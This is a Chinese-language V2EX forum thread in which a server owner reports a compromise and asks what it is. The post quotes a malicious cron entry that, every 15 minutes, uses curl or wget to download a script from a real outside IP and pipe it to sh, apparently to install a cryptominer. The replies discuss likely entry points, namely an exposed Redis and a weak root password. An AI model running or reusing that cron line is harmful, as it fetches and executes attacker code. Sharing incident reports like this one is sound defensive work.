Home Sign Up Sign In
densuc
V2EX  ›  问与答

我也中招了,服务器被抓肉鸡了

  •   
  •   densuc · Dec 31, 2019 · 3161 views
    This topic created in 2368 days ago, the information mentioned may be changed or developed.

    cron 里被植入:

    */15 * * * * (/usr/bin/qjowfa8||/usr/libexec/qjowfa8||/usr/local/bin/qjowfa8||/tmp/qjowfa8||curl -m180 -fsSL http://157.245.59.230:8000/i.sh||wget -q -T180 -O- http://157.245.59.230:8000/i.sh) | sh

    大佬们有什么头绪吗?大概是个挖矿脚本? 重装 ing....

  • qjowfa8
  • usr
  • bin
  • fssl
    4 replies    2019-12-31 11:59:59 +08:00
    R18
        1
    R18  
       Dec 31, 2019
    Redis 开了公网没密码
    luvroot
        2
    luvroot  
       Dec 31, 2019
    /usr/bin/qjowfa8 把这个搞下来看一下
    densuc
        3
    densuc  
    OP
       Dec 31, 2019
    @R18 可能是我 root 密码太弱的原因,我没有安装 Redis。。。

    @luvroot 我已经重装了。。。不过在新系统上运行了,好像暂时是个空文件,可能要挖矿后才会写入?
    jasonyang9
        4
    jasonyang9  
       Dec 31, 2019
    类似的,前天在家里弄了台旧笔记本配上 CentOS 7,PPPoE 拨号,IP Forwarding 和 Masquerading,当然还有 Firewalld,充当路由器玩玩的,帐密登录,心想第二天再改 RSA 密钥登录吧,想不到当晚就被黑了。早上起来看到 CPU 基本泡满,哈哈,还好家里其它设备没影响。立马下线重装。。。
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   2601 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 82ms · UTC 15:53 · PVG 23:53 · LAX 08:53 · JFK 11:53
    ♥ Do have faith in what you're doing.